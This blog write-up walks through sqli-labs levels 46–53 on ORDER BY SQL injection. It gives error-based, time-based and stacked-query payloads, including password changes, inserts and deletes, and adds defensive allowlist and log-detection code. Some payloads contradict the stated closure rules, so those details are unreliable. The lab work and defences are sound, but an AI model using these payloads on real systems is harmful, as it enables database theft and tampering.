
SQL Lab (46~53) (continuous update later) order by injection

2022-07-07 12:24:00 hcjtn

(46~50)

sql-lab-46

On entering level 46, the page prompts us to use the sort parameter:

[Screenshot: level 46 prompt to use the sort parameter]

We try ?sort=1 and see:

[Screenshot: result of ?sort=1]

Then ?sort=2:

[Screenshot: result of ?sort=2]

?sort=3:

[Screenshot: result of ?sort=3]

We see that with sort=1 the table is sorted by the first column, with sort=2 by the second column, and with sort=3 by the third column. That points to ORDER BY, so we guess the injection is in the ORDER BY clause.

Looking at the source code:

$sql = "SELECT * FROM users ORDER BY $id";

Our guess was right.

Let's get to know ORDER BY parameter injection:

ORDER BY injection means that the parameter following ORDER BY is user-controlled.

An injection point after ORDER BY differs from one after WHERE: UNION-based injection cannot be used there, so error-based injection or time-based blind injection is used instead.
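The fix for the pattern above is not escaping: a column name after ORDER BY cannot be bound as a query parameter, so the request value has to be mapped through an allowlist and must never reach the SQL text itself. The following Python example is added here and is not part of the original write-up or of sqli-labs; it builds the vulnerable query string next to an allowlist-based builder and runs the safe version against an in-memory SQLite table with constructed sample rows. The column names id, username and email, the SORT_COLUMNS map and the sample rows are assumptions for illustration.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample rows standing in for a "users" table (not the lab's own data).
SAMPLE_USERS: List[Tuple[int, str, str]] = [
    (1, "Dumb", "dumb@example.test"),
    (2, "Angelina", "angelina@example.test"),
    (3, "Dummy", "dummy@example.test"),
]

# The page's pattern: the raw parameter is spliced after ORDER BY, so anything
# following the number becomes SQL. Kept only to contrast with the safe builder.
def build_vulnerable_sql(sort: str) -> str:
    return f"SELECT * FROM users ORDER BY {sort}"

# Hardened form: the request value is only ever a key into a fixed map of
# column names (assumed names), and the direction is looked up the same way.
SORT_COLUMNS = {"1": "id", "2": "username", "3": "email"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def build_safe_sql(sort: str, direction: str = "asc") -> str:
    """Return an ORDER BY query whose text contains only allowlisted tokens."""
    try:
        column = SORT_COLUMNS[sort]
        order = SORT_DIRECTIONS[direction.lower()]
    except KeyError:
        # Anything not in the map is refused outright; no part of it is echoed
        # into the statement, so error-based, time-based and stacked payloads
        # never reach the database.
        raise ValueError("sort parameter not in allowlist") from None
    return f"SELECT id, username, email FROM users ORDER BY {column} {order}"

def is_rejected(sort: str, direction: str = "asc") -> bool:
    """True if the allowlist builder refuses this value (the check the lab lacks)."""
    try:
        build_safe_sql(sort, direction)
    except ValueError:
        return True
    return False

def query_users(sort: str, direction: str = "asc") -> List[Tuple[int, str, str]]:
    """Run the safe query against an in-memory table seeded with SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    rows = conn.execute(build_safe_sql(sort, direction)).fetchall()
    conn.close()
    return rows

if __name__ == "__main__":
    print(build_vulnerable_sql("2"))
    print(query_users("2", "desc"))
    print(is_rejected("-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q"))
```

The allowlist is the whole defence: because the only strings that can appear after ORDER BY are the literal values of SORT_COLUMNS and SORT_DIRECTIONS, the closing style of the injection point (numeric, single quote, parenthesis) stops mattering.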

Get the database name: ?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

Get a table name: ?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- q

Get a column name: ?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q

Query data: ?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

sql-lab-47

The principle is the same as level 46; the only difference is how the parameter is closed (a single quote here).

Get the database name: ?sort=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

Get a table name: ?sort=-1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- q

Get a column name: ?sort=-1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q

Query data: ?sort=-1' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q


sql-lab-48

Only time-based blind injection can be used in this level:

  1. Get the database name: ?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q (the first character is 's')

  2. Get a table name: ?sort=1 and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q (the first character is 'e')

  3. Get a column name: ?sort=1 and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q (the first character is 'i')

  4. Get data: ?sort=1' and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q


sql-lab-49

The same as level 48; only the closing style differs.

  1. Get the database name: ?sort=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q (the first character is 's')

  2. Get a table name: ?sort=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q (the first character is 'e')

  3. Get a column name: ?sort=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q (the first character is 'i')

  4. Get data: ?sort=1' and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q


sql-lab-50

Entering this level, it looks quite different from the previous ones, but what we input is still spliced after ORDER BY. So we try error-based injection and find that it works. What, then, is the difference between this level and the previous ones?

Let's look at the source code :

mysqli_multi_query($con1, $sql)

So this level is a combination of stacked injection and ORDER BY injection:

?sort=1;update users set password='hcjtn' where id=14-- q

?sort=1;insert into users values(50,'50','50')-- q
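The error-based payloads of level 46, the time-based ones of level 48 and the stacked ones of this level share one tell from the server side: the sort parameter stops being a small integer. The Python below is added here and is not taken from the write-up or from sqli-labs; it scans constructed access-log lines (combined log format, made up to mirror the requests in this write-up) and classifies any sort value that departs from the expected numeric shape. The log lines, the indicator lists (updatexml/extractvalue for error-based, sleep/benchmark for time-based, a statement separator for stacked queries) and the /Less-NN/ paths are assumptions for illustration.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines mirroring the requests in this write-up; they
# are not real server logs. Spaces in the query string are percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2022:12:24:00 +0000] "GET /Less-46/?sort=1 HTTP/1.1" 200 512
10.0.0.5 - - [07/Jul/2022:12:24:02 +0000] "GET /Less-46/?sort=3 HTTP/1.1" 200 512
10.0.0.5 - - [07/Jul/2022:12:24:05 +0000] "GET /Less-46/?sort=-1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--%20q HTTP/1.1" 200 301
10.0.0.5 - - [07/Jul/2022:12:24:09 +0000] "GET /Less-48/?sort=1%20and%20if((ascii(substr(database(),1,1))=115),sleep(5),1)--%20q HTTP/1.1" 200 512
10.0.0.5 - - [07/Jul/2022:12:24:15 +0000] "GET /Less-50/?sort=1;insert%20into%20users%20values(50,'50','50')--%20q HTTP/1.1" 200 512
"""

# Combined log format: client, identity, user, [timestamp], "METHOD target proto", status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Indicator classes checked, in order, against the decoded sort value.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("stacked", re.compile(r";")),
]

def classify_sort(value: str) -> Optional[str]:
    """Return an indicator label for a sort value, or None if it is a plain small integer."""
    if re.fullmatch(r"\d{1,3}", value):
        return None
    for label, pattern in INDICATORS:
        if pattern.search(value):
            return label
    # Anything else still violates the expected shape and is worth a look.
    return "non-numeric"

def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Yield (client ip, path, label) for every request whose sort value is suspicious."""
    findings: List[Tuple[str, str, str]] = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # parse_qs already percent-decodes once; unquote again catches double encoding.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("sort", []):
            label = classify_sort(unquote(raw))
            if label is not None:
                findings.append((m["ip"], parts.path, label))
    return findings

if __name__ == "__main__":
    for ip, path, label in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {label}")
```

The numeric-shape check does the real work: it flags every payload on this page regardless of closing style or which function is used, while the indicator labels only add triage context. Time-based injection is also visible as a cluster of slow requests from one client, so pairing this scan with response-time data from the same log is worthwhile where the server records it.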


(51~53)

sql-lab-51

The approach is the same as the previous level; only the closing style differs.

Error-based or time-based blind injection can be used; error-based injection is used here:

Get the database name: ?sort=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

Get a table name: ?sort=-1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- q

Get a column name: ?sort=-1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- q

Query data: ?sort=-1' and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

Then stacked injection:

?sort=1';insert into users values(21,'02','24')-- q


sql-lab-52

Same routine, same method. First determine the closing style: this level is not closed with a quote. Then try error-based injection to pop the database name, which turns out not to work, so only time-based blind injection can be used here:

  1. Get the database name: ?sort=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q (the first character is 's')

  2. Get a table name: ?sort=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q (the first character is 'e')

  3. Get a column name: ?sort=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q (the first character is 'i')

  4. Get data: ?sort=1' and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

Then stacked injection:

?sort=1;delete from users where id=50 -- q


sql-lab-53

First determine the closing style: there is no closure.

  1. Get the database name: ?sort=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q (the first character is 's')

  2. Get a table name: ?sort=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- q (the first character is 'e')

  3. Get a column name: ?sort=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- q (the first character is 'i')

  4. Get data: ?sort=1' and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)-- q

Then stacked injection:

?sort=1';delete from users where id=50 -- q


Copyright notice
This article was written by [hcjtn]; when reposting, please include the original link. Thanks.
https://yzsam.com/2022/02/202202130618271389.html